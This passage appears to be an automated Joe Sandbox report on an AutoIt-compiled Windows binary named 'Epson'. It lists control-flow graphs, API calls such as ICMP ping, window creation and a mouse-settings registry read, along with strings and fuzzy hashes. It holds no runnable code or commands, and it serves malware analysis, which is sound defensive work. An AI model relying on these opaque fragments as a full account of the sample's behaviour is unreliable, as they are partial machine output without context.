                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                      • Opcode ID: e8aaaf25b5c69fa5c0272574cbfffb3009bf369345fe94fc45fa81bd416508e1
                                                                                                                                                                                                                                      • Instruction ID: e0a73c075c5d216aca703913009330f18bba334aca28d913568ff5bbbe8d3493
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8aaaf25b5c69fa5c0272574cbfffb3009bf369345fe94fc45fa81bd416508e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33919231A04241AFD720DF15C888B16BBE6BF44328F18859AF5698F7A2C735ED45DB81

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 577 f5370f-f53724 578 f53784-f53786 577->578 579 f53726-f53729 577->579 578->579 582 f53788 578->582 580 f5372b-f53732 579->580 581 f5378a 579->581 583 f53804-f5380c PostQuitMessage 580->583 584 f53738-f5373d 580->584 586 f53790-f53795 581->586 587 f93df4-f93e1c call f52f92 call f6f23c 581->587 585 f5376f-f53777 DefWindowProcW 582->585 594 f537b8-f537ba 583->594 590 f53743-f53747 584->590 591 f93e61-f93e75 call fbc8f7 584->591 593 f5377d-f53783 585->593 588 f53797-f5379a 586->588 589 f537bc-f537e3 SetTimer RegisterWindowMessageW 586->589 623 f93e21-f93e28 587->623 595 f537a0-f537b3 KillTimer call f53907 call f559ff 588->595 596 f93d95-f93d98 588->596 589->594 597 f537e5-f537f0 CreatePopupMenu 589->597 598 f5374d-f53752 590->598 599 f5380e-f53818 call f6fcad 590->599 591->594 616 f93e7b 591->616 594->593 595->594 602 f93d9a-f93d9e 596->602 603 f93dd0-f93def MoveWindow 596->603 597->594 605 f53758-f5375d 598->605 606 f93e46-f93e4d 598->606 618 f5381d 599->618 610 f93dbf-f93dcb SetFocus 602->610 611 f93da0-f93da3 602->611 603->594 614 f53763-f53769 605->614 615 f537f2-f53802 call f5381f 605->615 606->585 613 f93e53-f93e5c call fb1423 606->613 610->594 611->614 619 f93da9-f93dba call f52f92 611->619 613->585 614->585 614->623 615->594 616->585 618->594 619->594 623->585 627 f93e2e-f93e41 call f53907 call f5396b 623->627 627->585
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F53709,?,?), ref: 00F53777
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00F53709,?,?), ref: 00F537A3
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F537C6
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F53709,?,?), ref: 00F537D1
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00F537E5
                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00F53806
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                      • Opcode ID: 170911d4ffccae4f4699f2e076c961ccb5574ba9bc810264d7e5ee2b669df0b9
                                                                                                                                                                                                                                      • Instruction ID: f37bd462340378b6d984965b480973d6567c13e32455f2bf0c984c53037656d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 170911d4ffccae4f4699f2e076c961ccb5574ba9bc810264d7e5ee2b669df0b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC4125F2E08154BBDF242F6CEC99B793A69F708392F104116FF4189181DA799B0CB762

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 633 f890c5-f890d5 634 f890ef-f890f1 633->634 635 f890d7-f890ea call f7f636 call f7f649 633->635 637 f89459-f89466 call f7f636 call f7f649 634->637 638 f890f7-f890fd 634->638 652 f89471 635->652 654 f8946c call f82b5c 637->654 638->637 639 f89103-f8912e 638->639 639->637 642 f89134-f8913d 639->642 645 f8913f-f89152 call f7f636 call f7f649 642->645 646 f89157-f89159 642->646 645->654 650 f8915f-f89163 646->650 651 f89455-f89457 646->651 650->651 657 f89169-f8916d 650->657 655 f89474-f89479 651->655 652->655 654->652 657->645 660 f8916f-f89186 657->660 662 f89188-f8918b 660->662 663 f891a3-f891ac 660->663 664 f8918d-f89193 662->664 665 f89195-f8919e 662->665 666 f891ca-f891d4 663->666 667 f891ae-f891c5 call f7f636 call f7f649 call f82b5c 663->667 664->665 664->667 671 f8923f-f89259 665->671 669 f891db-f891dc call f83b93 666->669 670 f891d6-f891d8 666->670 696 f8938c 667->696 679 f891e1-f891f9 call f82d38 * 2 669->679 670->669 673 f8932d-f89336 call f8fc1b 671->673 674 f8925f-f8926f 671->674 685 f89338-f8934a 673->685 686 f893a9 673->686 674->673 678 f89275-f89277 674->678 678->673 682 f8927d-f892a3 678->682 706 f891fb-f89211 call f7f649 call f7f636 679->706 707 f89216-f8923c call f897a4 679->707 682->673 687 f892a9-f892bc 682->687 685->686 691 f8934c-f8935b GetConsoleMode 685->691 689 f893ad-f893c5 ReadFile 686->689 687->673 692 f892be-f892c0 687->692 694 f89421-f8942c GetLastError 689->694 695 f893c7-f893cd 689->695 691->686 697 f8935d-f89361 691->697 692->673 698 f892c2-f892ed 692->698 700 f8942e-f89440 call f7f649 call f7f636 694->700 701 f89445-f89448 694->701 695->694 702 f893cf 695->702 704 f8938f-f89399 call f82d38 696->704 697->689 703 f89363-f8937d ReadConsoleW 697->703 698->673 705 f892ef-f89302 698->705 700->696 714 f8944e-f89450 701->714 715 f89385-f8938b call f7f613 701->715 710 f893d2-f893e4 702->710 712 f8939e-f893a7 703->712 713 f8937f GetLastError 703->713 704->655 705->673 717 f89304-f89306 705->717 706->696 707->671 710->704 721 f893e6-f893ea 710->721 712->710 713->715 714->704 715->696 717->673 718 f89308-f89328 717->718 718->673 727 f893ec-f893fc call f88de1 721->727 728 f89403-f8940e 721->728 739 f893ff-f89401 727->739 733 f8941a-f8941f call f88c21 728->733 734 f89410 call f88f31 728->734 740 f89415-f89418 733->740 734->740 739->704 740->739
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b5cccc43d88e4e28ccc054bd277edea7f2014a362ffa30f44c2ac84e0a1e5e00
                                                                                                                                                                                                                                      • Instruction ID: 8f24d7d868ba4bfd0c0dc33ff08a02a31674492f9713058fd030638e52184f31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cccc43d88e4e28ccc054bd277edea7f2014a362ffa30f44c2ac84e0a1e5e00
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10C1E171E08249AFCF11EFE8DC45BFDBBB4AF09310F184059E454AB292C7B59942EB61

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 741 f6ac3e-f6b063 call f58ec0 call f6bc58 call f5e6a0 748 fa8584-fa8591 741->748 749 f6b069-f6b073 741->749 750 fa8593 748->750 751 fa8596-fa85a5 748->751 752 fa896b-fa8979 749->752 753 f6b079-f6b07e 749->753 750->751 754 fa85aa 751->754 755 fa85a7 751->755 756 fa897b 752->756 757 fa897e 752->757 758 f6b084-f6b090 call f6b5b6 753->758 759 fa85b2-fa85b4 753->759 754->759 755->754 756->757 760 fa8985-fa898e 757->760 765 fa85bd 758->765 766 f6b096-f6b0a3 call f5c98d 758->766 759->765 763 fa8993 760->763 764 fa8990 760->764 769 fa899c-fa89eb call f5e6a0 call f6bbbe * 2 763->769 764->763 768 fa85c7 765->768 772 f6b0ab-f6b0b4 766->772 773 fa85cf-fa85d2 768->773 803 f6b1e0-f6b1f5 769->803 804 fa89f1-fa8a03 call f6b5b6 769->804 776 f6b0b8-f6b0d6 call f74d98 772->776 777 fa85d8-fa8600 call f74cd3 call f57ad5 773->777 778 f6b158-f6b16f 773->778 797 f6b0e5 776->797 798 f6b0d8-f6b0e1 776->798 813 fa862d-fa8651 call f57b1a call f5bd98 777->813 814 fa8602-fa8606 777->814 781 f6b175 778->781 782 fa8954-fa8957 778->782 786 fa88ff-fa8920 call f5e6a0 781->786 787 f6b17b-f6b17e 781->787 788 fa895d-fa8960 782->788 789 fa8a41-fa8a79 call f5e6a0 call f6bbbe 782->789 786->803 818 fa8926-fa8938 call f6b5b6 786->818 794 f6b184-f6b187 787->794 795 fa8729-fa8743 call f6bbbe 787->795 788->769 796 fa8962-fa8965 788->796 789->803 846 fa8a7f-fa8a91 call f6b5b6 789->846 805 fa86ca-fa86e0 call f56c03 794->805 806 f6b18d-f6b190 794->806 823 fa8749-fa874c 795->823 824 fa888f-fa88b5 call f5e6a0 795->824 796->752 796->803 797->768 809 f6b0eb-f6b0fc 797->809 798->776 807 f6b0e3 798->807 820 fa8ac9-fa8acf 803->820 821 f6b1fb-f6b20b call f5e6a0 803->821 837 fa8a2f-fa8a3c call f5c98d 804->837 838 fa8a05-fa8a0d 804->838 805->803 835 fa86e6-fa86fc call f6b5b6 805->835 816 f6b196-f6b1b8 call f5e6a0 806->816 817 fa8656-fa8659 806->817 807->809 809->752 819 f6b102-f6b11c 809->819 813->817 814->813 828 fa8608-fa862b call f5ad40 814->828 816->803 854 f6b1ba-f6b1cc call f6b5b6 816->854 817->752 834 fa865f-fa8674 call f56c03 817->834 857 fa893a-fa8943 call f5c98d 818->857 858 fa8945 818->858 819->773 833 f6b122-f6b154 call f6bbbe call f5e6a0 819->833 820->772 826 fa8ad5 820->826 844 fa874e-fa8751 823->844 845 fa87bf-fa87de call f5e6a0 823->845 824->803 880 fa88bb-fa88cd call f6b5b6 824->880 826->752 828->813 828->814 833->778 834->803 877 fa867a-fa8690 call f6b5b6 834->877 883 fa86fe-fa870b call f58ec0 835->883 884 fa870d-fa8716 call f58ec0 835->884 890 fa8ac2-fa8ac4 837->890 852 fa8a1e-fa8a29 call f5b4b1 838->852 853 fa8a0f-fa8a13 838->853 860 fa8ada-fa8ae8 844->860 861 fa8757-fa8774 call f5e6a0 844->861 845->803 882 fa87e4-fa87f6 call f6b5b6 845->882 894 fa8a93-fa8a9b 846->894 895 fa8ab5-fa8abe call f5c98d 846->895 852->837 900 fa8b0b-fa8b19 852->900 853->852 870 fa8a15-fa8a19 853->870 901 fa86ba-fa86c3 call f5c98d 854->901 902 f6b1d2-f6b1de 854->902 876 fa8949-fa894f 857->876 858->876 868 fa8aea 860->868 869 fa8aed-fa8afd 860->869 861->803 904 fa877a-fa878c call f6b5b6 861->904 868->869 885 fa8aff 869->885 886 fa8b02-fa8b06 869->886 887 fa8aa1-fa8aa3 870->887 876->803 915 fa869d-fa86ab call f58ec0 877->915 916 fa8692-fa869b call f5c98d 877->916 920 fa88de 880->920 921 fa88cf-fa88dc call f5c98d 880->921 882->803 923 fa87fc-fa8805 call f6b5b6 882->923 924 fa8719-fa8724 call f58577 883->924 884->924 885->886 886->821 887->803 890->803 905 fa8aa8-fa8ab3 call f5b4b1 894->905 906 fa8a9d 894->906 895->890 912 fa8b1b 900->912 913 fa8b1e-fa8b21 900->913 901->805 902->803 937 fa878e-fa879d call f5c98d 904->937 938 fa879f 904->938 905->895 905->900 906->887 912->913 913->760 944 fa86ae-fa86b5 915->944 916->944 922 fa88e2-fa88e9 920->922 921->922 931 fa88eb-fa88f0 call f5396b 922->931 932 fa88f5 call f53907 922->932 949 fa8818 923->949 950 fa8807-fa8816 call f5c98d 923->950 924->803 931->803 948 fa88fa 932->948 946 fa87a3-fa87ae call f79334 937->946 938->946 944->803 946->752 956 fa87b4-fa87ba 946->956 948->803 955 fa881c-fa883f 949->955 950->955 958 fa884d-fa8850 955->958 959 fa8841-fa8848 955->959 956->803 960 fa8852-fa885b 958->960 961 fa8860-fa8863 958->961 959->958 960->961 962 fa8873-fa8876 961->962 963 fa8865-fa886e 961->963 962->803 964 fa887c-fa888a 962->964 963->962 964->803
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                      • API String ID: 0-4285391669
                                                                                                                                                                                                                                      • Opcode ID: 065c596ec5a6df415f50415eafb55a8dff42b7a79e7c9d415ab01e3c1f901867
                                                                                                                                                                                                                                      • Instruction ID: 79ea0ad4d35d775812c6323aaa935f3d5e4845292fb4df7cd0133591c52f8608
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 065c596ec5a6df415f50415eafb55a8dff42b7a79e7c9d415ab01e3c1f901867
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24627DB0508381DFC324DF15C494A9ABBE0FF89354F14895EE8898B352DB75D94AEF82

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1001 f535b3-f53623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F535E1
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F53602
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F53368,?), ref: 00F53616
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F53368,?), ref: 00F5361F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                      • Opcode ID: ffdb79b38c8d2ee98efb731fc6a7ce2626a1d30e48e1d4a7fa00729f1e6302e4
                                                                                                                                                                                                                                      • Instruction ID: a5a765bc0f3b2a994129d4fb480293c9bc93296b716e3b9135fe1310d0349f5f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffdb79b38c8d2ee98efb731fc6a7ce2626a1d30e48e1d4a7fa00729f1e6302e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F05E706002D47AE7310B536C48E373EBDD7CBF10F20402EF904AB154C26A0851EBB1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F95287
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F56299
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                      • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                      • Opcode ID: 4622e1f94b1fd7416eac809e73143e38b0c0a156fceee027acfdadb50071e2b4
                                                                                                                                                                                                                                      • Instruction ID: 571906e5d04ed20469dd3b9d8aeefe4880238767b09ee72d5bbe8be133e57862
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4622e1f94b1fd7416eac809e73143e38b0c0a156fceee027acfdadb50071e2b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41D371408304AAC721EB60DC45AEF77ECAF84721F50461EFA9983091EF79964DEB92

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1053 f558cb-f558d6 1054 f55948-f5594a 1053->1054 1055 f558d8-f558dd 1053->1055 1057 f5593b-f5593e 1054->1057 1055->1054 1056 f558df-f558f7 RegOpenKeyExW 1055->1056 1056->1054 1058 f558f9-f55918 RegQueryValueExW 1056->1058 1059 f5592f-f5593a RegCloseKey 1058->1059 1060 f5591a-f55925 1058->1060 1059->1057 1061 f55927-f55929 1060->1061 1062 f5593f-f55946 1060->1062 1063 f5592d 1061->1063 1062->1063 1063->1059
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F558BE,SwapMouseButtons,00000004,?), ref: 00F558EF
                                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F558BE,SwapMouseButtons,00000004,?), ref: 00F55910
                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F558BE,SwapMouseButtons,00000004,?), ref: 00F55932
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                      • Opcode ID: b1196ae2d364d38f2ddd6d69b97459538f98c95eb136730b155c0a16c1bcaa6c
                                                                                                                                                                                                                                      • Instruction ID: 7b2bf1a2cce06ccd565eca270cac433956711b5aa4432567ac7db2ac999c3814
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1196ae2d364d38f2ddd6d69b97459538f98c95eb136730b155c0a16c1bcaa6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26115A76510618FFDB218F64CC80AEE7BBCEF40B61B104459EA01E7210E2359E45E760
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Variable must be of type 'Object'., xrefs: 00FA48C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                      • API String ID: 0-109567571
                                                                                                                                                                                                                                      • Opcode ID: bd61f99c9d4ca447dbdf9d5926656d50f7df5691c2adc0ba67d419b892fbdc22
                                                                                                                                                                                                                                      • Instruction ID: 8bb04211dfc54e295eb84327d3f9f2cce825ad0a9cd8601de50c335201c980c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd61f99c9d4ca447dbdf9d5926656d50f7df5691c2adc0ba67d419b892fbdc22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6C2AD71E00205DFCB24CF58C880BADB7F1BF49311F2481A9EA45AB391D779AD49EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00F615F2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                                                                                      • Opcode ID: 74300eb13e170e3ed0861e19f963a04ce398dab29be409d354da473e379f4ea0
                                                                                                                                                                                                                                      • Instruction ID: 60751d661311ce423618a9527aa08777208298c4d5e57d8f31ccd6554dce8c64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74300eb13e170e3ed0861e19f963a04ce398dab29be409d354da473e379f4ea0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB27C75A08341CFC724CF14C480B2AB7E1BF99314F28895DE98A8B351DB75ED45EB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F709D8
                                                                                                                                                                                                                                        • Part of subcall function 00F73614: RaiseException.KERNEL32(?,?,?,00F709FA,?,00000000,?,?,?,?,?,?,00F709FA,00000000,01019758,00000000), ref: 00F73674
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F709F5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
